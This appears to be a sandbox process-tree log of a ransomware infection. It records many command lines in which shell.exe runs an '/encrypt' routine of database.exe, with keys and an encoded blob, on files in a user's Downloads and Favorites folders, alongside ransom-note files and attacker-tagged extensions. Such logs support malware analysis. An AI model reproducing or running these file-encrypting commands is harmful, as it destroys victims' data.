"C:\Users\Admin\Downloads\ExpandPush.wmf.sage.gif"5⤵PID:5820
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\FindMerge.zip.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5948
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\GetDisable.cab.sage.gif"5⤵PID:3020
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\InitializeShow.m4v.sage.gif"5⤵PID:4620
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\MergeConvertFrom.pptm.sage.gif"5⤵PID:4364
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\OutDisable.wmv.sage.gif"5⤵PID:1676
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\OutUnpublish.wmf.sage.gif"5⤵PID:5996
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\PopConvert.txt.sage.gif"5⤵PID:4488
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\PushRedo.xlsm.sage.gif"5⤵PID:2572
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\README_sTlLoTpq.hta.gif"5⤵PID:1696
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\RemoveInstall.AAC.sage.gif"5⤵PID:4880
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\RemoveShow.mp2v.gif"5⤵PID:6576
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ResetStep.M2TS.sage.gif"5⤵PID:5480
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\Restore-My-Files.txt"5⤵PID:3560
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ShowUndo.hta.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5300
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\StartResume.xml.sage.gif"5⤵PID:4212
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\StartRevoke.cmd.sage.gif"5⤵PID:5964
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\SwitchCompare.mhtml.sage.gif"5⤵PID:6164
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\SZsXBggf-GRFOCNEg.[[email protected]].gif"5⤵PID:3520
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\TraceConvert.aif.sage.gif"5⤵PID:1836
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\UninstallInstall.ocx.gif"5⤵PID:5732
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\UnpublishStop.MOD.sage.gif"5⤵PID:5864
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\UnpublishSubmit.wvx.sage.gif"5⤵PID:3704
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\WatchGet.wmv.sage.gif"5⤵PID:6308
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6516
-
-
